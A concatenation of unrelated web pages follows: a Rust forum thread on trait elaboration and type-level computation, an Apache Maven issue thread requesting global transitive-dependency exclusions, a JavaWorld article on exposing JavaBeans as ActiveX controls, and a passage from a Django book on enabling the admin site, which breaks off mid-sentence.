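A related workaround that is sometimes used (a sketch with an assumed folder name, added here and not from the original thread) is to install packages into a writable folder next to the script and put that folder on sys.path, which avoids touching the read-only D:\Python27 tree:

import os, sys, pip

# Hypothetical writable folder next to the WebJob script
pkg_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "site-packages")

if pkg_dir not in sys.path:
    sys.path.insert(0, pkg_dir)

try:
    import mechanize
except ImportError:
    # --target installs into the given folder instead of the system site-packages
    pip.main(['install', '--target', pkg_dir, 'mechanize'])
    import mechanize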
https://codedump.io/share/0OEwcWzBMs0k/1/install-python-modules-in-azure
CC-MAIN-2017-09
en
refinedweb
Well, apparently the registry seems to have lost some of its importance with the arrival of .NET, at least that's the impression I seem to get. But luckily for us, Microsoft has given us two nice classes for doing just about anything we want to do with the registry. The classes are Microsoft.Win32.RegistryKey and Microsoft.Win32.Registry. They have both been put into the Microsoft.Win32 namespace as you can see because the registry is totally Microsoft Win32 specific. Without too much fuss, let's get into business and try and do some of the stuff we normally do with the registry. Microsoft.Win32.RegistryKey Microsoft.Win32.Registry Microsoft.Win32 //The Registry class provides us with the // registry root keys RegistryKey rkey = Registry.LocalMachine; //Now let's open one of the sub keys RegistryKey rkey1=rkey.OpenSubKey( "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"); //Now using GetValue(...) we read in various values //from the opened key listBox1.Items.Add("RegisteredOwner :- " + rkey1.GetValue("RegisteredOwner")); listBox1.Items.Add("RegisteredOrganization :- " + rkey1.GetValue("RegisteredOrganization")); listBox1.Items.Add("ProductName :- " + rkey1.GetValue("ProductName")); listBox1.Items.Add("CSDVersion :- " + rkey1.GetValue("CSDVersion")); listBox1.Items.Add("SystemRoot :- " + rkey1.GetValue("SystemRoot")); rkey1.Close(); rkey = Registry.CurrentUser; //The second parameter tells it to open the key as writable rkey1 = rkey.OpenSubKey("Software",true); // Now we create our sub key [assuming you have enough // rights to edit this area of the registry] RegistryKey rkey2 = rkey1.CreateSubKey("Tweety"); //Setting the various values is done using SetValue() //I couldn't figure out how to set the value type yet :-( rkey2.SetValue("Name","Tweety"); rkey2.SetValue("Age",24); rkey2.Close(); rkey1.Close(); If you open regedit, you'll see that the new key has been added and the values have indeed been written correctly. Okay, we've read from and written into the registry. Now let's enumerate some values. rkey1 = rkey.OpenSubKey("Software\\Microsoft\\" + "Internet Account Manager\\Accounts\\00000001"); string[] s_arr = rkey1.GetValueNames(); foreach(String s in s_arr) { listBox1.Items.Add(s + " :- " + rkey1.GetValue(s)); } rkey1.Close(); Well, that's about it I guess. This was originally written as part of an internal tutorial. I didn't modify it too much except for taking better screenshots. Thanks..
https://www.codeproject.com/articles/2003/registry-handling-with-net?fid=3506&df=90&mpp=25&sort=position&spc=relaxed&select=137841&tid=137925
CC-MAIN-2017-09
en
refinedweb
:Hi.
:
:Why is the following test necessary before including headers? (for
:example in sys/netgraph/netgraph.h).
:
:#ifndef _SYS_QUEUE_H_
:#include <sys/queue.h>
:#endif
:
:when <sys/queue.h> already tests for inclusion?
:
:#ifndef _SYS_QUEUE_H_
:#define _SYS_QUEUE_H_
:...
:#endif
:
:Thanks,
:Nuno

It isn't necessary; it just prevents GCC from re-scanning header files that it has already processed. It just speeds up compilation a bit. GCC does have an option to do that sort of thing automatically, but I really disagree with 'features' like that which break the C language and allow really sloppy programming. In any case, for compilation performance one doesn't have to do it with every #include (for example, I almost never bother in .C files), but doing it in some of the more recursive header files greatly reduces the load on the preprocessor.

-Matt
Matthew Dillon <[email protected]>
https://www.dragonflybsd.org/mailarchive/kernel/2007-06/msg00054.html
CC-MAIN-2017-09
en
refinedweb
Practical application of Singleton design pattern in Django

Today there is a huge number of software development methodologies (TDD among them) and design patterns. The singleton pattern is a design pattern that restricts the instantiation of a class to one object.

Let's consider how this pattern can be used in Django in practice. Settings for a web service, which will be stored in the database and edited via the admin panel, are a practical example. A minimal base class and a concrete settings model can look like this (the field defaults are omitted here; the load and save methods match the cached versions shown further below, minus the caching):

models.py

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.core.cache import cache
from django.db import models

class SingletonModel(models.Model):
    class Meta:
        abstract = True

    def save(self, *args, **kwargs):
        self.pk = 1
        super(SingletonModel, self).save(*args, **kwargs)

    @classmethod
    def load(cls):
        obj, created = cls.objects.get_or_create(pk=1)
        return obj

class SiteSettings(SingletonModel):
    support = models.EmailField()
    sales_depatment = models.EmailField(blank=True)

admin.py

from django.contrib import admin
from .models import SiteSettings

admin.site.register(SiteSettings)

To be able to use data from the settings in templates, you can add the settings object to the context either in each view or via a context processor.

context_processors.py

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from .models import SiteSettings

def settings(request):
    return {'settings': SiteSettings.load()}

Now let's connect the context processor in settings.py:

TEMPLATES = [
    {
        ...
        'OPTIONS': {
            ...
            'context_processors': [
                'common.context_processors.settings',
                ...
            ],
        },
    },
]

After this we can use the settings in templates in the following way:

Support: {{ settings.support }}
{% if settings.sales_depatment %}
    Sales Department: {{ settings.sales_depatment }}
{% endif %}

To reduce the number of database requests you can save the settings to the cache. For this, let's add a set_cache method to the model:

def set_cache(self):
    cache.set(self.__class__.__name__, self)

Let's update the save and load methods:

def save(self, *args, **kwargs):
    self.pk = 1
    super(SingletonModel, self).save(*args, **kwargs)
    self.set_cache()

@classmethod
def load(cls):
    if cache.get(cls.__name__) is None:
        obj, created = cls.objects.get_or_create(pk=1)
        if not created:
            obj.set_cache()
    return cache.get(cls.__name__)

Note that when the row is created for the first time, get_or_create calls save, which already places the object in the cache; the explicit set_cache call is only needed when the row already existed.

As a result, we applied the Singleton pattern to the design and storage of web application settings, added the settings object to a context processor, and reduced the number of database requests using standard caching. We answered how exactly to implement editable settings via the admin panel and how to solve such problems. The final code is available as a GitHub gist.
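As a final usage sketch (hypothetical view code, added here and not from the original article), any server-side code can fetch the same single row:

# views.py (illustrative)
from django.http import HttpResponse

from .models import SiteSettings

def support_contact(request):
    site_settings = SiteSettings.load()    # always returns the pk=1 instance
    return HttpResponse(site_settings.support)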
http://steelkiwi.com/blog/practical-application-singleton-design-pattern/
CC-MAIN-2017-09
en
refinedweb
For a numpy array X, the element X[k[0], ..., k[d-1]] is stored k[0]*s[0] + ... + k[d-1]*s[d-1] bytes away from X[0, ..., 0], where (s[0], ..., s[d-1]) = X.strides. Is there a way to check that this mapping is unambiguous for X, i.e. that no two index tuples map to the same memory location?

edit: It took me a bit to figure out what you are asking about. With striding tricks it's possible to index the same element in a data buffer in different ways, and broadcasting actually does this under the covers. Normally we don't worry about it because it is either hidden or intentional. Recreating the strided mapping and looking for duplicates may be the only way to test this. I'm not aware of any existing function that checks it. ================== I'm not quite sure what you are concerned with. But let me illustrate how shape and strides work. Define a 3x4 array: In [453]: X=np.arange(12).reshape(3,4) In [454]: X.shape Out[454]: (3, 4) In [455]: X.strides Out[455]: (16, 4) Index an item: In [456]: X[1,2] Out[456]: 6 I can get its index in a flattened version of the array (e.g. the original arange) with ravel_multi_index: In [457]: np.ravel_multi_index((1,2),X.shape) Out[457]: 6 I can also get this location using strides - keeping in mind that strides are in bytes (here 4 bytes per item): In [458]: 1*16+2*4 Out[458]: 24 In [459]: (1*16+2*4)/4 Out[459]: 6.0 All these numbers are relative to the start of the data buffer. We can get the data buffer address from X.data or X.__array_interface__['data'], but usually don't need to. So the strides tell us that to go from one entry to the next we step 4 bytes, and to go from one row to the next we step 16. Element 6 is located one row down, 2 over, or 24 bytes into the buffer. In the as_strided example of your link, strides=(1*2, 0) produces repeated indexing of specific values. With my X: In [460]: y=np.lib.stride_tricks.as_strided(X,strides=(16,0), shape=(3,4)) In [461]: y Out[461]: array([[0, 0, 0, 0], [4, 4, 4, 4], [8, 8, 8, 8]]) y is a 3x4 array that repeatedly indexes the 1st column of X. Changing one item in y ends up changing one value in X but a whole row in y: In [462]: y[1,2]=10 In [463]: y Out[463]: array([[ 0, 0, 0, 0], [10, 10, 10, 10], [ 8, 8, 8, 8]]) In [464]: X Out[464]: array([[ 0, 1, 2, 3], [10, 5, 6, 7], [ 8, 9, 10, 11]]) as_strided can produce some weird effects if you aren't careful. OK, maybe I've figured out what's bothering you - can I identify a situation like this, where two different indexing tuples end up pointing to the same location in the data buffer? Not that I'm aware of. That y's strides contain a 0 is a pretty good indicator. as_strided is often used to create overlapping windows: In [465]: y=np.lib.stride_tricks.as_strided(X,strides=(8,4), shape=(3,4)) In [466]: y Out[466]: array([[ 0, 1, 2, 3], [ 2, 3, 10, 5], [10, 5, 6, 7]]) In [467]: y[1,2]=20 In [469]: y Out[469]: array([[ 0, 1, 2, 3], [ 2, 3, 20, 5], [20, 5, 6, 7]]) Again, changing 1 item in y ends up changing 2 values in y, but only 1 in X. Ordinary array creation and indexing does not have this duplicate indexing issue. Broadcasting may do something like this under the covers, where a (4,) array is changed to (1,4) and then to (3,4), effectively replicating rows. There's a stride_tricks function that does this explicitly: In [475]: x,y=np.lib.stride_tricks.broadcast_arrays(X,np.array([.1,.2,.3,.4])) In [476]: x Out[476]: array([[ 0, 1, 2, 3], [20, 5, 6, 7], [ 8, 9, 10, 11]]) In [477]: y Out[477]: array([[ 0.1, 0.2, 0.3, 0.4], [ 0.1, 0.2, 0.3, 0.4], [ 0.1, 0.2, 0.3, 0.4]]) In [478]: y.strides Out[478]: (0, 8) In any case, in normal array use we don't have to worry about this ambiguity. We get it only with intentional actions, not accidental ones. 
==============

How about this for a test:

def dupstrides(x):
    uniq={sum(s*j for s,j in zip(x.strides,i)) for i in np.ndindex(x.shape)}
    print(uniq)
    print(len(uniq))
    print(x.size)
    return len(uniq)<x.size

In [508]: dupstrides(X)
{0, 32, 4, 36, 8, 40, 12, 44, 16, 20, 24, 28}
12
12
Out[508]: False

In [509]: dupstrides(y)
{0, 4, 8, 12, 16, 20, 24, 28}
8
12
Out[509]: True
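As a quick usage note (added here; it is not part of the original answer), the same test flags views produced by broadcasting:

import numpy as np

# np.broadcast_to returns a read-only view whose new axis has stride 0
z = np.broadcast_to(np.arange(4), (3, 4))
print(z.strides)      # e.g. (0, 8) on a typical 64-bit build
print(dupstrides(z))  # True: several index tuples map to one buffer offset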
https://codedump.io/share/N83Nj06K1Q8j/1/checking-non-ambiguity-of-strides-in-numpy-array
CC-MAIN-2017-09
en
refinedweb
Project
Write a program that will prompt the user for a list of 5 prices. Once the user has entered all values, your program should compute and display the following:
• The sum of all the prices
• The average of the prices
• All prices that are higher than the calculated average
To better solve this problem, break your code out into the following methods:
• sumArray – this method should receive an array and return the sum of all elements in the array. NOTE: this method produces no output.
• aveArray – this method should receive an array and return the average of all elements in the array. NOTE: this method produces no output.
• higherAve – this method should receive an array and the calculated average, and display all prices that are higher than the average.
Here is my coding so far. I cannot find the coding for finding the prices that are higher than the calculated average.

import javax.swing.*;

public class ArrayProgram {

    public static void main(String[] args) {
        String[] items = {"Apples", "Bananas", "Nectarines", "Oranges", "Plums"};
        double s;
        double a;
        double[] price = new double[5];
        for (int i = 0; i < items.length; i++) {
            price[i] = Double.parseDouble(JOptionPane.showInputDialog(("Enter Price for " + items[i])));
            s = sumArray(price);
            a = aveArray(price);
            higherAve(price, a);
            JOptionPane.showMessageDialog(null, "The total cost of these items is: $" + s);
            JOptionPane.showMessageDialog(null, "The average cost of these items is: $" + a);
            JOptionPane.showMessageDialog(null, "The prices above average are: ");
        }
    }

    public static double sumArray(double[] array) {
        double sum = 0.00;
        for(int s = 0; s < array.length; s++)
            sum += array[s];
        return sum;
    }

    //This function takes in an array of values and returns the average of all the values in the array
    public static double aveArray(double[] array) {
        //First get the sum of the values in the array
        double sum = sumArray(array);
        //Then divide the sum by the number of elements in the array to arrive at the average
        double a = sum / (double)array.length;
        return a;
    }

    //This function is used to find the prices higher than the average price
    public static void higherAve(double[] price, double a) {

    }
}

This post has been edited by Dogstopper: 26 April 2010 - 07:15 AM
Reason for edit:: Added code tags for the newbie
http://www.dreamincode.net/forums/topic/170333-java-array-help/
CC-MAIN-2017-09
en
refinedweb
ExecutionContext Class Manages the execution context for the current thread. This class cannot be inherited. Assembly: mscorlib (in mscorlib.dll). The following code example shows the use of members of the ExecutionContext class. using System; using System.Threading; using System.Security; using System.Collections; using System.Security.Permissions; using System.Runtime.Serialization; using System.Runtime.Remoting.Messaging; namespace Contoso { class ExecutionContextSample { static void Main() { try { Thread.CurrentThread.Name = "Main"; Console.WriteLine("Executing Main() in the primary application thread (\"{0}\").", Thread.CurrentThread.Name); FileDialogPermission fdp = new FileDialogPermission( FileDialogPermissionAccess.OpenSave); fdp.Deny(); // Capture the execution context containing the Deny. ExecutionContext eC = ExecutionContext.Capture(); // Suppress the flow of the execution context. Console.WriteLine("Suppress the flow of the execution context."); AsyncFlowControl aFC = ExecutionContext.SuppressFlow(); Console.WriteLine("Is the flow suppressed? " + ExecutionContext.IsFlowSuppressed()); Thread t1 = new Thread(new ThreadStart(DemandPermission)); t1.Name = "T1"; t1.Start(); t1.Join(); Console.WriteLine("Restore the flow."); aFC.Undo(); Console.WriteLine("Is the flow suppressed? " + ExecutionContext.IsFlowSuppressed()); Thread t2 = new Thread(new ThreadStart(DemandPermission)); t2.Name = "T2"; t2.Start(); t2.Join(); // Remove the Deny. CodeAccessPermission.RevertDeny(); // Capture the context that does not contain the Deny. ExecutionContext eC2 = ExecutionContext.Capture(); // Show that the Deny is no longer present. Thread t3 = new Thread(new ThreadStart(DemandPermission)); t3.Name = "T3"; t3.Start(); t3.Join(); // Use the Run method to execute DemandPermission in // the captured context, where Deny is active. The // demand fails. ExecutionContext.Run(eC, CallbackInContext, null); Console.WriteLine(); // Demonstrate the execution context methods. ExecutionContextMethods(); Console.WriteLine("Demo is complete, press Enter to exit."); Console.Read(); } catch (Exception e) { Console.WriteLine(e.Message); } } // Execute the Demand. static void DemandPermission() { try { Console.WriteLine("\nIn thread {0} executing a Demand for " + "FileDialogPermission.", Thread.CurrentThread.Name); new FileDialogPermission( FileDialogPermissionAccess.OpenSave).Demand(); Console.WriteLine("Successfully demanded " + "FileDialogPermission."); } catch (Exception e) { Console.WriteLine("Demand for FileDialogPermission failed with {0}.", e.GetType()); } } static void ExecutionContextMethods() { // Generate a call context for this thread. ContextBoundType cBT = new ContextBoundType(); cBT.GetServerTime(); ExecutionContext eC1 = ExecutionContext.Capture(); ExecutionContext eC2 = eC1.CreateCopy(); Console.WriteLine("\nThe hash code for the first execution " + "context is: " + eC1.GetHashCode()); // Create a SerializationInfo object to be used for getting the // object data. SerializationInfo sI = new SerializationInfo( typeof(ExecutionContext), new FormatterConverter()); eC1.GetObjectData( sI, new StreamingContext(StreamingContextStates.All)); LogicalCallContext lCC = (LogicalCallContext)sI.GetValue( "LogicalCallContext", typeof(LogicalCallContext)); // The logical call context object should contain the previously // created call context. Console.WriteLine("Is the logical call context information " + "available? 
" + lCC.HasInfo); } static void CallbackInContext(object state) { // The state is not used in this example. DemandPermission(); } } // One means of communicating between client and server is to use the // CallContext class. Calling CallContext effectivel puts the data in a thread // local store. This means that the information is available to that thread // or that logical thread (across application domains) only. [Serializable] public class CallContextString : ILogicalThreadAffinative { String _str = ""; public CallContextString(String str) { _str = str; Console.WriteLine("A CallContextString has been created."); } public override String ToString() { return _str; } } public class ContextBoundType : ContextBoundObject { private DateTime starttime; public ContextBoundType() { Console.WriteLine("An instance of ContextBoundType has been " + "created."); starttime = DateTime.Now; } [SecurityPermissionAttribute(SecurityAction.Demand, Flags = SecurityPermissionFlag.Infrastructure)] public DateTime GetServerTime() { Console.WriteLine("The time requested by a client."); // This call overwrites the client's // CallContextString. CallContext.SetData( "ServerThreadData", new CallContextString("This is the server side replacement " + "string.")); return DateTime.Now; } } } /* This code produces output similar to the following: Executing Main() in the primary application thread ("Main"). Suppress the flow of the execution context. Is the flow suppressed? True In thread T1 executing a Demand for FileDialogPermission. Successfully demanded FileDialogPermission. Restore the flow. Is the flow suppressed? False In thread T2 executing a Demand for FileDialogPermission. Demand for FileDialogPermission failed with System.Security.SecurityException. In thread T3 executing a Demand for FileDialogPermission. Successfully demanded FileDialogPermission. In thread Main executing a Demand for FileDialogPermission. Demand for FileDialogPermission failed with System.Security.SecurityException. An instance of ContextBoundType has been created. The time requested by a client. A CallContextString has been created. The hash code for the first execution context is: 58225482 Is the logical call context information available? True Demo is complete, press Enter to exit. */ System.Threading.Execution.
https://msdn.microsoft.com/en-us/library/system.threading.executioncontext(v=vs.90)
CC-MAIN-2017-09
en
refinedweb
This project started from the author's frustration that he could not find any simple, portable XML parser to use inside all his projects (for example, inside the award-winning TIMi software suite created by the Business-Insight company). Let's look at the well-known Xerces C++ library: the complete Xerces project is 53 MB (11 MB compressed in a zipfile). In 2003, he was developing many small tools and was using XML as the standard for all his input/output configuration and data files. The source code of his small tools was usually around 600 KB. In these conditions, don't you think that 53 MB to be able to read an XML file is a little bit "too much"? So he created his own XML parser. His XML parser "library" is composed of only 2 files: a .cpp file and a .h file. The total size is 104 KB.

Here is how it works: the XML parser loads a full XML file in memory, parses the file and generates a tree structure representing the XML file. Of course, you can also parse XML data that you have already stored yourself into a memory buffer. Thereafter, you can easily "explore" the tree to get your data. You can also modify the tree using "add" and "delete" functions and regenerate a formatted XML string from a subtree. Memory management is totally transparent through the use of smart pointers; in other words, you will never have to do any new, delete, malloc or free ("smart pointers" are a primitive version of the garbage collector in Java). To the best of his knowledge, there exists no other "non-validating C++ XML parser" that is as simple and as powerful. Well, TinyXML is pretty powerful too!

Here are the characteristics of the XMLParser library:

- Non-validating XML parser written in standard C++ (DTD and XSD information is ignored).
- Cross-platform: the library is currently used every day on Solaris, Linux (32 bit and 64 bit) and Windows to manipulate "small" PMML documents (10 MB). The library has been tested and is working flawlessly with the following compilers: gcc (under Linux, Mac OS X Tiger and many Unix flavours), Visual Studio 6.0, Visual Studio .NET (under Windows 9x, NT, 2000, XP, Vista, CE, Mobile), the Intel C/C++ compiler, the SUN CC compiler, and the Borland C++ compiler. The library is also used under Apple OS, iPhone/iPad OS, Amiga OS, QNX and on the Netburner platform. To the best of my knowledge, all platforms are now supported.
- The parser builds a tree structure that you can "explore" easily (DOM-type parser).
- The parser can be used to generate XML strings from subtrees (this is called rendering). You can also save subtrees directly to files (with automatic "Byte Order Mark" (BOM) support).
- Modification or "from scratch" creation of large XML tree structures in memory, using functions like addChild, addAttribute, updateAttribute, deleteAttribute, ...
- It's SIMPLE: no need to learn how to use dozens of classes: there is only one simple class, the 'XMLNode' class (that represents one node of the XML tree).
- Very efficient (efficiency is required to be able to handle BIG files):
  - The string parser is very efficient: it does only one pass over the XML string to create the tree, and it does the minimal amount of memory allocations. For example, it does NOT use the slow STL string class but plain, simple and fast C mallocs. It also allocates large chunks of memory instead of many small chunks. Inside Visual C++, the "debug versions" of the memory allocation functions are very slow: do not forget to compile in "release mode" to get maximum speed.
  - The "tree exploration" is very efficient because all operations on the 'XMLNode' class are handled through references: there are no memory copies and no memory allocations, ever.
  - The XML string rendering is very efficient: it does one pass to compute the total memory size of the XML string and a second pass to actually create the string. There is thus only one memory allocation and no extra memory copy. Other libraries are slower because they use the string concatenation operator, which requires many memory (re-)allocations and memory copies.
- In-memory parsing.
- Supports XML namespaces.
- Very small and totally stand-alone (not built on top of something else). Uses only standard C/C++ library functions.
- Easy to integrate into your own projects: it's only 2 files! The .h file does not contain any implementation code. Compilation is thus very fast.
- Robust. Optionally, if you define the C++ preprocessor directives STRICT_PARSING and/or APPROXIMATE_PARSING, the library can be "forgiving" in case of errors inside the XML. He has tried to respect the XML specs.
- Fully integrated error handling:
  - The string parser gives you the precise position and type of the error inside the XML string (if an error is detected).
  - The library allows you to "explore" a part of the tree that is missing. However, data extracted from "missing subtrees" will be NULL. This way, it's really easy to code "error handling" procedures.
- Thread-safe (however, the global parameters "guessUnicodeChar" and "strictUTF8Parsing" must be unique because they are shared by all threads).
- Full native support for a wide range of character sets and encodings: ANSI (legacy) / UTF-8 / Shift-JIS / GB2312 / Big5 / GBK. Under Windows, Linux, Linux 64 bit and Solaris, there is additionally Unicode 16 bit / Unicode 32 bit widechar character support, which includes:
  - For the Unicode version of the library: automatic conversion to Unicode before parsing (if the input XML file is standard ANSI 8 bit characters).
  - For the ASCII version of the library: automatic conversion to legacy or UTF-8 before parsing (if the input XML file is Unicode 16 or 32 bit wide characters).
- The XMLParser library is able to handle Chinese, Japanese, Cyrillic and other extended characters successfully, thanks to extended UTF-8 encoding support, Shift-JIS (Japanese) encoding support, and GB2312/Big5/GBK (Chinese) encoding support (see the UTF-8 demo that shows the characters available). If you are still experiencing character encoding problems, he suggests converting your XML files to UTF-8 using a tool like iconv (a precompiled Win32 binary is available).
- Transparent memory management through the use of smart pointers.
- Support for a wide range of clearTags containing unformatted text: {![CDATA[ ... ]]}, {!-- ... --}, {PRE} ... {/PRE}, {!DOCTYPE ... }. Unformatted texts are not parsed by the library and can contain items that are usually 'forbidden' in XML (for example: HTML code).
- Support for inclusion of pure binary data (images, sounds, ...) into the XML document using the four provided ultra-fast Base64 conversion functions.

The library is under the Aladdin Free Public License (AFPL). 
A small tutorial

Let's assume that you want to parse the XML file "PMMLModel.xml", which contains (the inner content is abridged here, as it was cut off in the original):

<?xml version="1.0" encoding="ISO-8859-1"?>
<PMML version="3.0" xmlns="..." xmlns:xsi="...">
  <RegressionModel ...>
    <RegressionTable ...>
      ...
    </RegressionTable>
  </RegressionModel>
</PMML>

Let's analyse, line by line, the following small example program:

#include <stdio.h>
#include <stdlib.h>
#include "xmlParser.h"

int main(int argc, char **argv)
{
    // this opens and parses the XML file:
    XMLNode xMainNode = XMLNode::openFileHelper("PMMLModel.xml", "PMML");

    // this prints a formatted output based on the content of the
    // first "Extension" tag of the XML file:
    char *t = xMainNode.getChildNode("Extension").createXMLString(true);
    printf("%s\n", t);
    free(t);
    return 0;
}
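The feature list above also mentions building trees from scratch with addChild and addAttribute and rendering them with createXMLString. As a rough illustration of that side of the API, here is a minimal sketch; the function names come from the feature list and tutorial above, but the exact signatures (and the createXMLTopNode entry point) are assumptions — check xmlParser.h for the real declarations:

#include <stdio.h>
#include <stdlib.h>
#include "xmlParser.h"

int main()
{
    // create a new top-level node named "PMML" (entry-point name assumed):
    XMLNode xMainNode = XMLNode::createXMLTopNode("PMML");
    xMainNode.addAttribute("version", "3.0");

    // grow the tree: add a child node with an attribute of its own
    XMLNode xModel = xMainNode.addChild("RegressionModel");
    xModel.addAttribute("functionName", "regression");

    // render the whole tree back into a formatted XML string
    char *t = xMainNode.createXMLString(true);
    printf("%s\n", t);
    free(t); // the caller owns the rendered string, as in the tutorial above
    return 0;
}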
http://younsi.blogspot.com/2011/11/small-simple-cross-platform-free-and.html
Necessary for benchmarks. This is currently the most needed opcode reported by abort messages in v8 & sunspider test suite when they are executed with '--ion -n' flags. Created attachment 584358 [details] [diff] [review] Implement JSOP_THIS Comment on attachment 584358 [details] [diff] [review] Implement JSOP_THIS Review of attachment 584358 [details] [diff] [review]: ----------------------------------------------------------------- JSOP_THIS is unfortunately more complicated - see ComputeThis(). The logic is something like: * If |this| is an object, return |this|. * If |this| is null or undefined, |this| is globalObj->thisObject() * If |this| is a primitive, return js_PrimitiveToObject(this) So any time |this| is used where we don't already know that |this| has been computed, we need to replace it with a new SSA name. In this case it's okay to use the MIR node for |this| to determine whether |this| is already computed. One option is to have a ComputeThis(Value) -> Value instruction that has a guard, and an out-of-line path for returning the new |this|. With TypeInference we can also determine the type ComputeThis will return (however there wouldn't be a type barrier, so we'd have to manually unbox). Created attachment 585484 [details] [diff] [review] Implement JSOP_THIS Specialize this with type inference and compile JSOP_THIS only if the type is an object. Otherwise, abort the compilation with a message. Comment on attachment 585484 [details] [diff] [review] Implement JSOP_THIS Review of attachment 585484 [details] [diff] [review]: ----------------------------------------------------------------- ::: js/src/ion/IonBuilder.cpp @@ +362,5 @@ > // -- ResumePoint(v0) > // > // As usual, it would be invalid for v1 to be captured in the initial > // resume point, rather than v0. > + current->add(actual); Whoops, good catch. @@ +3004,5 @@ > +{ > + // initParameters only initialized "this" after the following check, make > + // sure we can safely access thisSlot. > + if (!info().fun()) > + return false; Should this be an abort? Or is this an error? (As written it'll be OOM) @@ +3011,5 @@ > + MDefinition *thisParam = current->getSlot(info().thisSlot()); > + > + if (thisParam->type() != MIRType_Object) { > + IonSpew(IonSpew_Abort, "Cannot compile this, not an object."); > + return false; Instead: return abort("... otherwise this will act as OOM. (In reply to David Anderson [:dvander] from comment #6) > @@ +3004,5 @@ > > +{ > > + // initParameters only initialized "this" after the following check, make > > + // sure we can safely access thisSlot. > > + if (!info().fun()) > > + return false; > > Should this be an abort? Or is this an error? (As written it'll be OOM) I think this should be an assertion, because the bytecode is badly produced. So I just removed the check as the assertion is already done by "info().thisSlot()". (forgot reviewer, sorry) *** Bug 713855 has been marked as a duplicate of this bug. ***
https://bugzilla.mozilla.org/show_bug.cgi?id=701961
I am having problems figuring out how to get the results from the strings and then give myself the option to sort through them alphabetically (or numerically). I have the code to the point where it shows the input data but don't know where to go from there. I'm fairly new to java so I don't even know if I'm doing the first part right. I have looked in to sort options with Arrays but am not to sure how to use them (or if I have done it right to allow myself to use them). Any help would be appreciated. Below is a copy of my code. The questions I am trying to solve is "Your program should then use a menu that allows the user to display, search and exit. Display should display the list of the entries, sorted by last name, first name, or birth-date as requested by the user. Search should search for a specific entry by a specific field (last name, first name or birth-date) as requested by the user." import javax.swing.JOptionPane; public class Program2 { //Loop # public static void main(String [] args) { int Runs; do{ String runQuestion = JOptionPane.showInputDialog(null, "Number of patients to enter in? (1-2)", "Total # Of Patients", JOptionPane.QUESTION_MESSAGE); Runs = Integer.parseInt(runQuestion); if( Runs < 1 || Runs > 2) { //Small test numbers for now JOptionPane.showMessageDialog(null, "Please pick a number between 1 and 2", "Wrong Number Chosen", JOptionPane.INFORMATION_MESSAGE); } } while(Runs < 1 || Runs > 2); Questions(Runs); } //Data Gathering Questions public static void Questions(int Runs) { for(char index = 0;index < Runs;index ++) { //Questions String firstName = JOptionPane.showInputDialog(null, "Patients First Name?", "First Name", JOptionPane.QUESTION_MESSAGE); String lastName = JOptionPane.showInputDialog(null, "Patients Last Name?", "Last Name", JOptionPane.QUESTION_MESSAGE); String dateBirth = JOptionPane.showInputDialog(null, "Patients Date of Birth?", "DOB", JOptionPane.QUESTION_MESSAGE); String firstSort = String firstName; //Data Table print list System.out.println(firstName + " " + lastName + " " + dateBirth); } } }
https://www.daniweb.com/programming/software-development/threads/383948/display-search-and-exit-string-inputs
So I wrote some stuff about traits =). I'm opening this thread to talk about the post and any questions that may arise. I hope to be writing more posts covering other things; I'll re-use the thread in that case.

To elaborate on my pithy reddit comment: isn't your notion of equality through normalization equivalent to Homotopy Type Theory's Univalence Axiom, which treats equality and equivalence as... equivalent? While you are approaching things from a different foundation, I suspect that some implications of the univalence axiom are relevant.

Your parallel to LLVM IR brings to mind the issue of quality error messages. LLVM proper does not generate any errors or warnings; they all come from the language front-end. In the case of Clang, this leads to a fair bit of duplicated functionality, such as control flow graphs and dominator trees, which are computed both in Clang and in LLVM. LLVM can't produce good diagnostics because it is working on a lower-level representation, and it is not always clear if a construct comes directly from user code or from a previous transformation. For example, some Clang warnings are disabled for code that results from expanding a preprocessor macro, and LLVM has no idea what the preprocessor is. It's important that a type checker can give better error messages than "No!", so I think it is worth considering early on how such a solver might communicate with the user.

As an aside, LLVM can produce one error: "Ran out of registers during register allocation". It means that you wrote inline assembly with a set of operand constraints that the register allocator couldn't solve. Clang can't type-check the constraints early because the formal definition of correct inline asm is "whatever works", and it depends on many obscure code generation flags. It's not a great user experience.

The relationship between the IR and the source code seems much more direct than in the case of LLVM IR. For example, each impl's well-formedness corresponds to one Horn clause, and each bound it depends on is one predicate. In fact, because this is specifically an IR for typechecking, the fundamental primitive is really a representation of a potential type error. It's an important thing to keep in mind when designing the system, though.

Very nice! Having official formal rules about the trait system should be a great starting point for reasoning about its abstract properties, and a stand-alone reference implementation may even be amenable to program verification - certainly more than any part of rustc itself.

Regarding equality modulo reduction (or "computation"), that would be the standard definitional/judgemental equality in Martin-Löf type theory. A quick example in Lean:

class Clone (Self : Type) :=
-- some part of Lean gets confused if you don't use the class parameters at all
(clone : Self → Self)

instance : Clone ℕ :=
{ clone := id }

class Iterator (Self : Type) :=
(Item : Type)
(next : Self → option (Self × Item))

structure IntoIter (A : Type) : Type

instance (A : Type) : Iterator (IntoIter A) :=
{ Item := A, next := λ x, none }

structure Enumerate (T : Type) : Type

-- `[Iterator T]` will be resolved by typeclass resolution
instance (T : Type) [Iterator T] : Iterator (Enumerate T) :=
{ Item := ℕ × Iterator.Item T, next := λ x, none }

-- we can explicitly ask things to be reduced...
eval Clone (Iterator.Item (IntoIter ℕ)) -- "Clone ℕ"

-- or rely on implicit reduction, such as during typeclass resolution
def f (it : Iterator.Item (IntoIter ℕ)) := Clone.clone it

Now, if you also want propositional equalities to be respected, your type theory must be extensional, such as the one in NuPRL. Which I know absolutely nothing about. If you are stuck with an intensional one... well, you'll have to get creative. Lean does, however, feature a novel implementation of congruence closure in its proof automation. For a nice overview of the different kinds of equality, see also this article.

Ah, I long had a nagging suspicion that the (current) MIR, as a core language for perhaps the operational semantics of Rust, was only half the battle, but I struggled (and still struggle; I'm not at all sure "operational semantics" is what I'm looking for) to express that thought clearly. I'm glad @nikomatsakis evidently agrees, and a solution is on the way!

As an aside, I'd be curious to know if anyone has suggestions for related work around this area of "customizable equality". In particular, I'm not aware of logic languages that have to prove goals to prove equality.

Indeed, as @tupshin mentioned, this topic is covered by Homotopy Type Theory, where type equality is the real cornerstone. I am strongly advising you to have a look. By the way, the book is freely distributed on the official site.

